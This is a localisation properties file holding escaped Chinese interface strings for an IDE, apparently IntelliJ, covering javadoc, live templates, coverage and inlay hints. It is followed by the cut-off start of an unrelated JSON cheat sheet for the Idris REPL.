{1}\njavadoc.method.overrides=\\u91cd\\u5199:\njavadoc.method.specified.by=\\u6307\\u5b9a\\u8005:\njavadoc.external.fetch.error.message=\\u65e0\\u6cd5\\u83b7\\u53d6\\u8fdc\\u7a0b\\u6587\\u6863\\uff1a\\u5185\\u90e8\\u9519\\u8bef\nsearching.for.implementations=\\u641c\\u7d22\\u5b9e\\u73b0...\n\ngoto.implementation.chooserTitle=\\u9009\\u62e9 {0} \\u7684\\u5b9e\\u73b0\\u65b9\\u6cd5({1} \\u627e\\u5230 {2})\ngoto.implementation.findUsages.title={0} \\u7684\\u5b9e\\u73b0\ngoto.implementation.notFound=\\u627e\\u4e0d\\u5230\\u5b9e\\u73b0\n\ngoto.test.chooserTitle.test=\\u9009\\u62e9 {0} \\u7684\\u6d4b\\u8bd5({1} \\u627e\\u5230 {2})\ngoto.test.findUsages.test.title={0} \\u7684\\u6d4b\\u8bd5\ngoto.test.chooserTitle.subject=\\u9009\\u62e9 {0} \\u7684\\u6d4b\\u8bd5\\u5bf9\\u8c61({1} \\u627e\\u5230 {2})\ngoto.test.findUsages.subject.title={0} \\u7684\\u6d4b\\u8bd5\\u5bf9\\u8c61\ngoto.test.notFound=\\u6ca1\\u6709\\u627e\\u5230\\u6d4b\\u8bd5\\u5bf9\\u8c61\n\nincremental.search.tooltip.prefix=\\u641c\\u7d22:\ngoto.super.property.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u5c5e\\u6027\ngoto.super.method.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.method.of.chooser.title=\\u9009\\u62e9 {0} \\u7684\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.method.findUsages.title={0} \\u7684\\u8d85\\u7c7b\\u65b9\\u6cd5\ngoto.super.class.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u6216\\u63a5\\u53e3\njavadoc.action.back=\\u540e\\u9000\njavadoc.action.forward=\\u5411\\u524d\njavadoc.action.view.external=\\u67e5\\u770b\\u5916\\u90e8\\u6587\\u6863\njavadoc.documentation.not.found.message=\\u627e\\u4e0d\\u5230\\u6b64\\u5143\\u7d20\\u7684\\u6587\\u6863\\u3002\\n\\u8bf7\\u5728\\u201c\\u9879\\u76ee\\u8bbe\\u7f6e\\u201d\\u4e2d\\u5c06\\u6240\\u6709\\u9700\\u8981\\u7684\\u8def\\u5f84\\u6dfb\\u52a0\\u5230 API \\u6587\\u6863\\u3002\njavadoc.documentation.not.found.title=\\u6ca1\\u6709\\u6587\\u6863\njavadoc.fetching.progress=\\u83b7\\u53d6\\u6587\\u6863...\nno.documentation.found=\\u6ca1\\u6709\\u627e\\u5230\\u6587\\u6863\\u3002\njavadoc.constructor.candidates=new {0}() \\u7684\\u5019\\u9009\\u662f:
{1}\njavadoc.candidates=\\u8c03\\u7528 {0} \\u7684\\u65b9\\u6cd5\\u5019\\u9009\\u662f:

{1}\njavadoc.candidates.not.found=\\u6ca1\\u6709\\u627e\\u5230\\u8c03\\u7528 {0} \\u7684\\u65b9\\u6cd5\\u5019\\u9009\\u3002\ndeclaration.navigation.title=\\u9009\\u62e9\\u58f0\\u660e\ntemplate.shortcut.enter=\\u56de\\u8f66\ntemplate.shortcut.tab=Tab\ntemplate.shortcut.space=\\u7a7a\\u683c\ntemplate.shortcut.custom=\\u81ea\\u5b9a\\u4e49\ntemplate.shortcut.none=\\u6ca1\\u6709\ndialog.edit.live.template.title=\\u7f16\\u8f91\\u4ee3\\u7801\\u6a21\\u677f\ndialog.add.live.template.title=\\u6dfb\\u52a0\\u4ee3\\u7801\\u6a21\\u677f\ntemplates.no.defined=\\u5728\\u8fd9\\u4e2a\\u4e0a\\u4e0b\\u6587\\u4e2d\\u6ca1\\u6709\\u5b9a\\u4e49\\u6a21\\u677f\ntemplates.surround.no.defined=\\u5728\\u6b64\\u4e0a\\u4e0b\\u6587\\u4e2d\\u6ca1\\u6709\\u5b9a\\u4e49\\u5305\\u56f4\\u6a21\\u677f\ntemplates.settings.page.title=\\u4ee3\\u7801\\u6a21\\u677f\ntemplates.select.template.chooser.title=\\u9009\\u62e9\\u6a21\\u677f\ntemplates.dialog.edit.variables.title=\\u7f16\\u8f91\\u6a21\\u677f\\u53d8\\u91cf\ntemplates.dialog.edit.variables.border.title=\\u53d8\\u91cf\ntemplates.dialog.edit.variables.action.move.up=\\u4e0a\\u79fb(&U)\ntemplates.dialog.edit.variables.action.move.down=\\u4e0b\\u79fb(&D)\ntemplates.dialog.edit.variables.table.column.name=\\u540d\\u79f0\ntemplates.dialog.edit.variables.table.column.expression=\\u8868\\u8fbe\\u5f0f\ntemplates.dialog.edit.variables.table.column.default.value=\\u9ed8\\u8ba4\\u503c\ntemplates.dialog.edit.variables.table.column.skip.if.defined=\\u5982\\u679c\\u5df2\\u5b9a\\u4e49\\u5219\\u8df3\\u8fc7\ntemplates.dialog.table.column.abbreviation=\\u7f29\\u5199\ntemplates.dialog.table.column.description=\\u63cf\\u8ff0\ntemplates.dialog.table.column.active=\\u6fc0\\u6d3b\ntemplates.dialog.shortcut.chooser.label=\\u9ed8\\u8ba4\\u5c55\\u5f00\\u901a\\u8fc7\ndialog.copy.live.template.title=\\u590d\\u5236\\u4ee3\\u7801\\u6a21\\u677f\ndialog.edit.template.shortcut.default=\\u9ed8\\u8ba4({0})\ndialog.edit.template.template.text.title=\\u6a21\\u677f\\u6587\\u672c:(&T)\ndialog.edit.template.button.edit.variables=\\u7f16\\u8f91\\u53d8\\u91cf(&E)\ndialog.edit.template.label.abbreviation=\\u7f29\\u5199:(&B)\ndialog.edit.template.label.group=\\u7ec4:(&G)\ndialog.edit.template.label.description=\\u63cf\\u8ff0:(&D)\ndialog.edit.template.options.title=\\u9009\\u9879\ndialog.edit.template.label.expand.with=\\u5c55\\u5f00(&X)\ndialog.edit.template.checkbox.reformat.according.to.style=\\u6839\\u636e\\u6837\\u5f0f\\u91cd\\u65b0\\u683c\\u5f0f\\u5316(&R)\ndialog.edit.template.checkbox.shorten.fq.names=\\u7f29\\u77ed FQ \\u540d\\u79f0(&F)\ndialog.edit.template.checkbox.use.static.import=\\u5982\\u679c\\u53ef\\u80fd\\uff0c\\u4f7f\\u7528\\u9759\\u6001\\u5bfc\\u5165(&I)\ndialog.edit.template.context.title=\\u4e0a\\u4e0b\\u6587\ndialog.edit.template.checkbox.html=HTML(&H)\ndialog.edit.template.checkbox.xml=XML(&X)\ndialog.edit.template.checkbox.jsp=JSP(&P)\ndialog.edit.template.checkbox.smart.type.completion=\\u667a\\u80fd\\u7c7b\\u578b\\u8865\\u5168(&O)\ndialog.edit.template.error.title=\\u65e0\\u6cd5\\u4fdd\\u5b58\ndialog.edit.template.error.malformed.abbreviation=\\u65e0\\u6cd5\\u4fdd\\u5b58\\u6a21\\u677f\\u3002\\n\\u6a21\\u677f\\u7f29\\u5199\\u5e94\\u4ec5\\u5305\\u542b\\u5b57\\u6bcd\\uff0c\\u6570\\u5b57\\uff0c\\u70b9\\u548c\\u8fde\\u5b57\\u7b26\\u3002\ndialog.edit.template.error.already.exists=\\u65e0\\u6cd5\\u4fdd\\u5b58\\u6a21\\u677f\\u3002\\n\\u7f29\\u5199\\u4e3a \"{0}\" \\u7684\\u6a21\\u677f\\n\\u5df2\\u7ecf\\u5b58\\u5728\\u4e8e\\u7ec4 \"{1}\" \\u4e2d\\u3002\\n\\u8bf7\\u9009\\u62e9\\u5176\\u4ed6\\u7f29\\u5199\\u6216\\u7ec4\\u3002\nfinish.template.command=\\u5b8c\\u6210\\u6a21\\u677f\ninsert.code.template.command=\\u63d2\\u5165\\u4ee3\\u7801\\u6a21\\u677f\ntemplate.next.variable.command=\\u8f6c\\u5230\\u4e0b\\u4e00\\u4e2a\\u4ee3\\u7801\\u6a21\\u677f\\u9009\\u9879\\u5361\ntemplate.previous.variable.command=\\u8f6c\\u5230\\u4e0a\\u4e00\\u4e2a\\u4ee3\\u7801\\u6a21\\u677f\\u9009\\u9879\\u5361\nmacro.array.variable=arrayVariable()\nmacro.capitalize.string=capitalize(String)\nmacro.cast.to.left.side.type=castToLeftSideType()\nmacro.classname=className()\nmacro.component.type.of.array=componentTypeOf(Array)\nmacro.current.package=currentPackage()\nmacro.decapitalize.string=decapitalize(String)\nmacro.firstWord.string=firstWord(String)\nmacro.undescoresToSpaces.string=underscoresToSpaces(String)\nmacro.spacesToUnderscores.string=spacesToUnderscores(String)\nmacro.undescoresToCamelCase.string=underscoresToCamelCase(String)\nmacro.capitalizeAndUnderscore.string=capitalizeAndUnderscore(String)\nmacro.descendant.classes.enum=descendantClassesEnum(String)\nmacro.enum=enum(...)\nmacro.expected.type=expectedType()\nmacro.groovy.script=groovyScript(\"groovy code\")\nmacro.guess.element.type.of.container=guessElementType(Container)\nmacro.expression.type=expressionType(Expression)\nmacro.iterable.component.type=iterableComponentType(ArrayOrIterable)\nmacro.iterable.variable=iterableVariable()\nmacro.linenumber=lineNumber()\nmacro.methodname=methodName()\nmacro.method.parameters=methodParameters()\nmacro.qualified.class.name=qualifiedClassName()\nmacro.right.side.type=rightSideType()\nmacro.suggest.index.name=suggestIndexName()\nmacro.suggest.variable.name=suggestVariableName()\nmacro.suggest.first.variable.name=suggestFirstVariableName()\nmacro.variable.of.type=variableOfType(Type)\nmacro.file.name=fileName()\nmacro.file.name.without.extension=fileNameWithoutExtension()\ncommand.name.surround.with.runtime.cast=\\u7528\\u8fd0\\u884c\\u65f6\\u8f6c\\u6362\\u5305\\u56f4\ninspection.i18n.expression.is.invalid.error.message=\\u56fd\\u9645\\u5316\\u8868\\u8fbe\\u5f0f\\u6a21\\u677f\\u4e0d\\u662f\\u6709\\u6548\\u7684\\u8868\\u8fbe\\u5f0f\ninspection.error.dialog.title=\\u9519\\u8bef\nlivetemplate.description.tag.pair=\\u6807\\u7b7e\\u5bf9\nlivetemplate.description.itar=\\u8fed\\u4ee3\\u6570\\u7ec4\\u5143\\u7d20\nlivetemplate.description.itco=\\u8fed\\u4ee3 java.util.Collection \\u7684\\u5143\\u7d20\nlivetemplate.description.iten=\\u8fed\\u4ee3 java.util.Enumeration\nlivetemplate.description.itit=\\u8fed\\u4ee3 java.util.Iterator\nlivetemplate.description.itli=\\u8fed\\u4ee3 java.util.List \\u7684\\u5143\\u7d20\nlivetemplate.description.ittok=\\u8fed\\u4ee3\\u5b57\\u7b26\\u4e32\\u4e2d\\u7684\\u5b57\\u7b26\nlivetemplate.description.ritar=\\u4ee5\\u76f8\\u53cd\\u7684\\u987a\\u5e8f\\u8fed\\u4ee3\\u6570\\u7ec4\\u7684\\u5143\\u7d20\nlivetemplate.description.iter=\\u8fed\\u4ee3 Iterable | \\u6570\\u7ec4\nlivetemplate.description.itover=\\u8fed\\u4ee3 Iterable \\u6216\\u6570\\u7ec4\\u9009\\u62e9\nlivetemplate.description.inst=\\u4f7f\\u7528 instanceof \\u68c0\\u67e5\\u5bf9\\u8c61\\u7c7b\\u578b\\u5e76\\u5c06\\u5176\\u964d\\u7ea7\nlivetemplate.description.lst=\\u83b7\\u53d6\\u6570\\u7ec4\\u7684\\u6700\\u540e\\u4e00\\u4e2a\\u5143\\u7d20\nlivetemplate.description.mn=\\u4e3a\\u53d8\\u91cf\\u8bbe\\u7f6e\\u8f83\\u5c0f\\u7684\\u503c\nlivetemplate.description.mx=\\u4e3a\\u53d8\\u91cf\\u8bbe\\u7f6e\\u66f4\\u5927\\u7684\\u503c\nlivetemplate.description.psvm=main() \\u65b9\\u6cd5\\u58f0\\u660e\nlivetemplate.description.toar=\\u5c06 java.util.Collection \\u7684\\u5143\\u7d20\\u5b58\\u50a8\\u5230\\u6570\\u7ec4\\u4e2d\nlivetemplate.description.lazy=\\u6267\\u884c\\u5ef6\\u8fdf\\u521d\\u59cb\\u5316\nlivetemplate.description.if.not.null=\\u63d2\\u5165 'if not null' \\u8bed\\u53e5\nlivetemplate.description.if.null=\\u63d2\\u5165 'if null' \\u8bed\\u53e5\nlivetemplate.description.geti=\\u63d2\\u5165\\u5355\\u4f8b\\u65b9\\u6cd5 getInstance\nlivetemplate.description.serr=\\u6253\\u5370\\u4e00\\u4e2a\\u5b57\\u7b26\\u4e32\\u5230 System.err\nlivetemplate.description.sout=\\u6253\\u5370\\u4e00\\u4e2a\\u5b57\\u7b26\\u4e32\\u5230 System.out\nlivetemplate.description.souf=\\u6253\\u5370\\u4e00\\u4e2a\\u683c\\u5f0f\\u5316\\u5b57\\u7b26\\u4e32\\u5230 System.out\nlivetemplate.description.soutm=\\u6253\\u5370\\u5f53\\u524d\\u7684\\u7c7b\\u540d\\u548c\\u65b9\\u6cd5\\u540d\\u5230 System.out\nlivetemplate.description.soutp=\\u6253\\u5370\\u65b9\\u6cd5\\u53c2\\u6570\\u7684\\u540d\\u79f0\\u548c\\u503c\\u5230 System.out\nlivetemplate.description.soutv=\\u6253\\u5370\\u4e00\\u4e2a\\u503c System.out\nlivetemplate.description.st=String\nlivetemplate.description.psf=public static final\nlivetemplate.description.prsf=private static final\nlivetemplate.description.psfi=public static final int\nlivetemplate.description.psfs=public static final String\nlivetemplate.description.thr=throw new\nlivetemplate.description.surround.braces=\\u7528{}\\u5305\\u56f4\nlivetemplate.description.surround.parens=\\u7528 () \\u5305\\u56f4\nlivetemplate.description.surround.tag=\\u7528 \\u5305\\u56f4\nlivetemplate.description.surround.cdata.in.xmlorhtmlorjsp=\\u7528 CDATA \\u90e8\\u5206\\u5305\\u56f4\nlivetemplate.description.surround.with.callable=\\u7528 Callable \\u5305\\u56f4\nlivetemplate.description.surround.with.read.lock=\\u7528 ReadWriteLock.readLock \\u5305\\u56f4\nlivetemplate.description.surround.with.write.lock=\\u7528 ReadWriteLock.writeLock \\u5305\\u56f4\nquickfix.add.variable.text=\\u521d\\u59cb\\u5316\\u53d8\\u91cf ''{0}''\nquickfix.add.variable.family.name=\\u521d\\u59cb\\u5316\\u53d8\\u91cf\ninspection.i18n.quickfix.annotate.as=\\u6ce8\\u89e3\\u4e3a @{0}\ninspection.i18n.quickfix.annotate.element.as=\\u6ce8\\u89e3 {0} ''{1}'' \\u4e3a @{2}\ninspection.i18n.quickfix.annotate=\\u6ce8\\u89e3...\ninspection.i18n.quickfix.annotate.element=\\u6ce8\\u89e3 {0} ''{1}''...\ndisable.intention.action=\\u7981\\u7528 ''{0}''\nenable.intention.action=\\u542f\\u7528 ''{0}''\nunder.construction.string=\\u6b63\\u5728\\u6784\\u5efa\\u3002\ninspection.i18n.option.ignore.comment.pattern=\\u5ffd\\u7565\\u5305\\u542b\\u6b64\\u6ce8\\u91ca\\u7684\\u884c(java.util.Pattern \\u683c\\u5f0f\\u7684\\u6a21\\u5f0f)\\uff1a\ninspection.i18n.option.ignore.comment.title=Non-Nls \\u6ce8\\u91ca\\u6a21\\u5f0f\ninspection.i18n.option.ignore.assigned.to.constants=\\u5ffd\\u7565\\u5206\\u914d\\u7ed9\\u5e38\\u91cf\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.tostring=\\u5ffd\\u7565 toString() \\u65b9\\u6cd5\\u7684\\u5185\\u5bb9\nintention.move.initializer.to.constructor=\\u5c06\\u521d\\u59cb\\u5316\\u5668\\u79fb\\u5230\\u6784\\u9020\\u51fd\\u6570\nintention.move.initializer.to.set.up=\\u5c06\\u521d\\u59cb\\u5316\\u5668\\u79fb\\u52a8\\u5230 setUp \\u65b9\\u6cd5\nintention.move.field.assignment.to.declaration=\\u5c06\\u8d4b\\u503c\\u79fb\\u5230\\u5b57\\u6bb5\\u58f0\\u660e\ni18nize.jsp.error=\\u8bf7\\u9009\\u62e9 JSP \\u6587\\u672c\\u8fdb\\u884c\\u56fd\\u9645\\u5316\\u3002\\n\\u786e\\u4fdd\\u60a8\\u6ca1\\u6709\\u9009\\u62e9\\u4efb\\u4f55 scriptlet\\uff0c\\u81ea\\u5b9a\\u4e49\\u6807\\u7b7e\\u6216\\u5176\\u4ed6\\u5176\\u4ed6\\u8bed\\u8a00\\u5143\\u7d20\\u3002\\n\\u6b64\\u5916\\uff0c\\u9009\\u62e9\\u5185\\u7684 HTML \\u6807\\u7b7e\\u5fc5\\u987b\\u5e73\\u8861\\u3002\ni18nize.error.title=\\u4e0d\\u80fd\\u56fd\\u9645\\u5316\\u6240\\u9009\\u5185\\u5bb9\ni18nize.error.message=\\u60a8\\u53ea\\u80fd\\u56fd\\u9645\\u5316 Java \\u5b57\\u7b26\\u4e32\\u6587\\u5b57\\u6216\\u5176\\u5b50\\u5b57\\u7b26\\u4e32\\u3002\\n\\u8bf7\\u5c06\\u63d2\\u5165\\u7b26\\u6307\\u5411 Java \\u5b57\\u7b26\\u4e32\\u6587\\u5b57\\u6216\\u9009\\u62e9\\u5176\\u4e2d\\u7684\\u4e00\\u90e8\\u5206\\u3002\ndisplay.coverage.prompt=\\u8981\\u663e\\u793a ''{0}'' \\u7684\\u8986\\u76d6\\u7387\\u6570\\u636e\\u5417\\uff1f\ncode.coverage=\\u4ee3\\u7801\\u8986\\u76d6\\u7387\ncoverage.button.add.package=\\u6dfb\\u52a0\\u5305\ncoverage.pattern.filter.editor.choose.package.title=\\u9009\\u62e9\\u5305\nno.coverage=\\u6ca1\\u6709\\u8986\\u76d6\ncode.coverage.is.not.supported=jre 5.0\\u6216\\u66f4\\u9ad8\\u7248\\u672c\\u652f\\u6301\\u4ee3\\u7801\\u8986\\u76d6\ntitle.popup.show.coverage=\\u8986\\u76d6\\u7387\\u5957\\u4ef6\nprompt.remove.coverage=\\u4f60\\u8981\\u79fb\\u9664 ''{0}'' \\u8986\\u76d6\\u7387\\u6570\\u636e\\u5417?\ntitle.remove.coverage.data=\\u79fb\\u9664\\u8986\\u76d6\\u7387\\u6570\\u636e\ncoverage.data.outdated=\\u8986\\u76d6\\u7387\\u6570\\u636e\\u5df2\\u8fc7\\u671f\ncoverage.data.not.found=\\u672a\\u627e\\u5230\\u8986\\u76d6\\u7387\\u6570\\u636e\nerror.cannot.resolve.class=\\u65e0\\u6cd5\\u89e3\\u6790\\u7c7b ''{0}''\nimplementation.view.title={0} \\u7684\\u5b9a\\u4e49\njavadoc.info.title=\\u6587\\u6863\\u4e3a {0}\nintention.intercept.ejb.method.or.class.family=\\u6dfb\\u52a0 EJB \\u62e6\\u622a\\u5668\nintention.intercept.ejb.method.or.class.class.text=\\u4e3a EJB \\u7c7b ''{0}'' \\u6dfb\\u52a0\\u62e6\\u622a\\u5668\nintention.intercept.ejb.method.or.class.method.text=\\u4e3a\\u4e1a\\u52a1\\u65b9\\u6cd5 ''{0}'' \\u6dfb\\u52a0\\u62e6\\u622a\\u5668\nintention.edit.interceptor.binding.family=\\u62e6\\u622a\\u5668\\u7ed1\\u5b9a\nintention.edit.interceptor.binding.text=\\u7f16\\u8f91\\u62e6\\u622a\\u5668 ''{0}'' \\u7684\\u7ed1\\u5b9a\npowered.by=\\u6280\\u672f\\u652f\\u6301\\uff1a\npowered.by.plugin=''{0}'' \\u63d2\\u4ef6\nerror.cannot.convert.default.message=\\u65e0\\u6548\\u7684\\u503c:''{0}''\nerror.cannot.resolve.default.message=\\u65e0\\u6cd5\\u89e3\\u6790\\u7b26\\u53f7 ''{0}''\nerror.cannot.resolve.0.1=\\u65e0\\u6cd5\\u89e3\\u6790 {0} ''{1}''\nunknown.encoding.0=\\u672a\\u77e5\\u7f16\\u7801\\uff1a''{0}''\nerror.unknown.enum.value.message=\\u672a\\u77e5\\u7684\\u679a\\u4e3e\\u503c ''{0}''\ni18nize.cant.create.properties.file.because.its.name.is.associated=\\u4e0d\\u80fd\\u521b\\u5efa\\u5c5e\\u6027\\u6587\\u4ef6 ''{0}''\\uff0c\\u56e0\\u4e3a\\u5b83\\u7684\\u540d\\u79f0\\u4e0e {1} \\u76f8\\u5173\\u8054\\u3002\ni18nize.error.creating.properties.file=\\u521b\\u5efa\\u5c5e\\u6027\\u6587\\u4ef6\\u65f6\\u51fa\\u9519\nnode.method.tooltip=\\u65b9\\u6cd5\nnode.field.tooltip=\\u5b57\\u6bb5\nnode.annotation.tooltip=\\u6ce8\\u89e3\nnode.anonymous.class.tooltip=\\u533f\\u540d\\u7c7b\nnode.enum.tooltip=\\u679a\\u4e3e\nnode.exception.tooltip=\\u5f02\\u5e38\nnode.interface.tooltip=\\u63a5\\u53e3\nnode.junit.test.tooltip=JUnit \\u6d4b\\u8bd5\nnode.runnable.class.tooltip=Runnable \\u7c7b\nnode.class.tooltip=\\u7c7b\nnode.excluded.flag.tooltip=\\u6392\\u9664\nnode.abstract.flag.tooltip=Abstract\nnode.final.flag.tooltip=Final\nnode.static.flag.tooltip=Static\nmultiple.implementations.tooltip=\\u591a\\u4e2a\\u5b9e\\u73b0\nstatic.class.initializer={0} \\u7c7b\\u521d\\u59cb\\u5316\\u5668\n\n# suppress inspection \"UnusedProperty\"\nintentions.category.ejb=EJB\nset.language.level=\\u8bbe\\u7f6e\\u8bed\\u8a00\\u7ea7\\u522b\nset.language.level.to.0=\\u8bbe\\u7f6e\\u8bed\\u8a00\\u7ea7\\u522b\\u4e3a {0}\nremove.annotation=\\u79fb\\u9664\\u6ce8\\u89e3\nannotate.intention.chooser.title=\\u9009\\u62e9\\u8981\\u6dfb\\u52a0\\u7684\\u6ce8\\u89e3\ndeannotate.intention.action.text=\\u53d6\\u6d88\\u6ce8\\u89e3\ndeannotate.intention.chooser.title=\\u9009\\u62e9\\u8981\\u5220\\u9664\\u7684\\u6ce8\\u89e3\njavadoc.type.parameters=\\u7c7b\\u578b\\u53c2\\u6570:\nhighlight.overridden.classes.chooser.title=\\u9009\\u62e9\\u8981\\u7a81\\u51fa\\u663e\\u793a\\u8986\\u76d6\\u65b9\\u6cd5\\u7684\\u7c7b\nno.methods.overriding.0.are.found=\\u6ca1\\u6709\\u627e\\u5230 {0, choice, 0#|1# '{1}' |2#these classes} \\u91cd\\u5199\\u65b9\\u6cd5\ncopy.abstract.method.no.existing.implementations.found=\\u627e\\u4e0d\\u5230\\u73b0\\u6709\\u7684\\u5b9e\\u73b0\ncopy.abstract.method.intention.name=\\u4f7f\\u7528 ''{0}'' \\u7684\\u73b0\\u6709\\u5b9e\\u73b0\ncopy.abstract.method.popup.title=\\u9009\\u62e9\\u8981\\u590d\\u5236\\u7684\\u5b9e\\u73b0\ncopy.abstract.method.title=\\u4f7f\\u7528\\u62bd\\u8c61\\u65b9\\u6cd5\\u5b9e\\u73b0\ni18nize.empty.file.path=\\u8bf7\\u6307\\u5b9a\\u5c5e\\u6027\\u7684\\u6587\\u4ef6\\u8def\\u5f84\nchoose.type.popup.title=\\u9009\\u62e9\\u7c7b\\u578b\ncast.expression=\\u8f6c\\u6362\\u8868\\u8fbe\\u5f0f\ncast.to.0=\\u8f6c\\u6362\\u4e3a ''{0}''\nclass.completion.file.path=\\u518d\\u6b21\\u6309 {0} \\u641c\\u7d22\\u6240\\u6709\\u5339\\u914d\\u7684\\u9879\\u76ee\\u6587\\u4ef6\nclass.completion.file.path.all.variants=\\u6309 {0} \\u641c\\u7d22\\u4efb\\u4f55\\u7c7b\\u578b\\u7684\\u5339\\u914d\\u6587\\u4ef6\nproperty.has.more.parameters.than.passed=\\u5c5e\\u6027 ''{0}'' \\u671f\\u671b {1} {1, choice, 1#\\u4e2a\\u53c2\\u6570|2#\\u4e2a\\u53c2\\u6570}, \\u4f20\\u4e86 {2}\ncreate.file.family=\\u521b\\u5efa\\u6587\\u4ef6\nrename.file.reference.family=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\\u53c2\\u8003\nrename.file.reference.text=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\\u53c2\\u8003\\u4e3a {0}\ncreate.directory.text=\\u521b\\u5efa\\u76ee\\u5f55 {0}\ncreate.file.text=\\u521b\\u5efa\\u6587\\u4ef6 {0}\ncreate.file.incorrect.path.hint=\\u65e0\\u6cd5\\u627e\\u5230\\u6216\\u521b\\u5efa\\u76ee\\u6807\\u76ee\\u5f55 for ''{0}''\ncreate.tagfile.text=\\u521b\\u5efa\\u6807\\u8bb0\\u6587\\u4ef6 {0}\nrename.file.fix=\\u91cd\\u547d\\u540d\\u6587\\u4ef6\nrename.element.family=\\u91cd\\u547d\\u540d\\u5143\\u7d20\nrename.public.class.text=\\u5c06\\u7c7b ''{0}'' \\u91cd\\u547d\\u540d\\u4e3a ''{1}''\nrename.named.element.text=\\u5c06 ''{0}'' \\u91cd\\u547d\\u540d\\u4e3a ''{1}''\ndialog.edit.template.checkbox.html.text=HTML \\u6587\\u672c\ndialog.edit.template.checkbox.xsl.text=XSL \\u6587\\u672c\nhighlight.imported.classes.chooser.title=\\u9009\\u62e9 Imported \\u7c7b\\u9ad8\\u4eae\\u663e\\u793a\nhighlight.imported.members.chooser.title=\\u9009\\u62e9 Imported \\u6210\\u5458\\u9ad8\\u4eae\\u663e\\u793a\njavadoc.error.resolving.url=\\u65e0\\u6cd5\\u89e3\\u6790\\u7f51\\u5740 {0}

\\u5728 project settings \\u4e2d\\u914d\\u7f6e API \\u6587\\u6863\\u53ef\\u80fd\\u4f1a\\u6709\\u5e2e\\u52a9\\u3002\n\ninlay.hints.show.settings=\\u7981\\u7528\\u65b9\\u6cd5 ''{0}'' \\u7684\\u63d0\\u793a\ninlay.hints.show.settings.description=\\u6253\\u5f00\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\\u8bbe\\u7f6e\ninlay.hints.blacklist.method=\\u4e0d\\u663e\\u793a\\u5f53\\u524d\\u65b9\\u6cd5\\u7684\\u63d0\\u793a\ninlay.hints.blacklist.method.description=\\u5c06\\u5f53\\u524d\\u65b9\\u6cd5\\u6dfb\\u52a0\\u5230\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\\u9ed1\\u540d\\u5355\ninlay.hints.intention.family.name=\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\ninlay.hints.enable.action.text=\\u542f\\u7528\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\ninlay.hints.disable.action.text=\\u7981\\u7528\\u63d0\\u793a\ninlay.hints.blacklist.pattern.explanation=To disable hints for a method use the appropriate pattern:

java.lang - methods from java.lang package
java.lang.*(*, *) - methods from the java.lang package with two parameters
(*info) - single parameter methods where the parameter name ends with info
(key, value) - methods with parameters key and value
*.put(key, value) - put methods with key and value parameters

\ninlay.hints.base.blacklist.description={0} \\u9ed8\\u8ba4\\u5e94\\u7528\\u9ed1\\u540d\\u5355\ninlay.hints.disable.custom.option=\\u7981\\u7528 ''{0}''\ninlay.hints.enable.custom.option=\\u542f\\u7528 ''{0}''\ninlay.hints.language.list.description=\\u4e3a\\u9879\\u76ee\\u4e2d\\u4f7f\\u7528\\u7684\\u7279\\u5b9a\\u8bed\\u8a00\\u914d\\u7f6e\\u5185\\u8054\\u63d0\\u793a\\u8bbe\\u7f6e\\u3002\n\nintention.extract.set.from.comparison.chain.family=\\u4ece\\u6bd4\\u8f83\\u94fe\\u4e2d\\u63d0\\u53d6\\u96c6\\u5408\nintention.extract.set.from.comparison.chain.duplicates={0} \\u68c0\\u6d4b\\u5230\\u8fd9\\u4e2a\\u7c7b\\u4e2d\\u7684 {1} \\u4e2a\\u4ee3\\u7801\\u7247\\u6bb5\\u53ef\\u4ee5\\u66ff\\u6362\\u4e3a\\u65b0\\u7684\\u521b\\u5efa\\u96c6\\u3002\\u4f60\\u60f3\\u66ff\\u6362\\u5b83{1,choice,1#|2#\\u4eec}\\u5417?\n\nblock.comment.intersects.existing.comment=\\u9009\\u4e2d\\u533a\\u57df\\u4e0e\\u73b0\\u6709\\u6ce8\\u91ca\\u76f8\\u4ea4\nblock.comment.wrapping.suffix=\\u9009\\u4e2d\\u533a\\u57df\\u5305\\u542b\\u5757\\u6ce8\\u91ca\\u540e\\u7f00\nblock.comment.nested.comment=\\u9009\\u4e2d\\u533a\\u57df\\u5305\\u542b\\u5757\\u6ce8\\u91ca\\uff0c\\n\\u5305\\u56f4\\u7684\\u8303\\u56f4\\u88ab\\u6ce8\\u91ca\\u3002\n\nintention.unroll.loop.family=\\u5c55\\u5f00\\u5faa\\u73af\n\nparameter.info.switch.overload.shortcuts=Switch \\u7528 {0} \\u6216 {1}\nparameter.info.switch.overload.shortcuts.single=Switch \\u7528 {0}\n\ncollapse.selection.existing.autogenerated.region=\\u65e0\\u6cd5\\u79fb\\u9664\\u81ea\\u52a8\\u751f\\u6210\\u7684\\u6298\\u53e0\\u533a\\u57df\ncollapse.selection.overlapping.warning.title=\\u6298\\u53e0\\u9009\\u62e9\ncollapse.selection.overlapping.warning.text=\\u5b58\\u5728\\u91cd\\u53e0\\u6298\\u53e0\\u533a\\u57df\ncollapse.selection.overlapping.warning.ok=\\u79fb\\u9664\ncollapse.selection.overlapping.warning.cancel=\\u53d6\\u6d88\n\nchange.uid.action.name=\\u968f\\u673a\\u66f4\\u6539 'serialVersionUID' \\u521d\\u59cb\\u5316\\u5668\n\nintention.convert.to.single.return.name=\\u5c06\\u4e3b\\u4f53\\u8f6c\\u6362\\u4e3a\\u5355\\u4e2a\\u9000\\u51fa\\u70b9\\u5f62\\u5f0f"} {"text": "{\n \"id\": \"idris_repl_cheat_sheet\",\n \"name\": \"Idris REPL\",\n \"description\": \"Basic commands for the Idris REPL\",\n \"metadata\": {\n \"sourceName\": \"Idris-Lang\",\n \"sourceUrl\": \"http://www.idris-lang.org\"\n },\n \"template_type\": \"terminal\",\n \"section_order\": [\n \"From the Prompt\",\n \"Documentation and Searching\",\n \"Changing Settings\",\n \"Displaying Information\",\n \"Advanced Usage\"\n ],\n \"sections\": {\n \"From the Prompt\": [\n {\n \"key\": \"\",\n \"val\": \"Evaluate an expression.\"\n },\n {\n \"key\": \":t, :type\",\n \"val\": 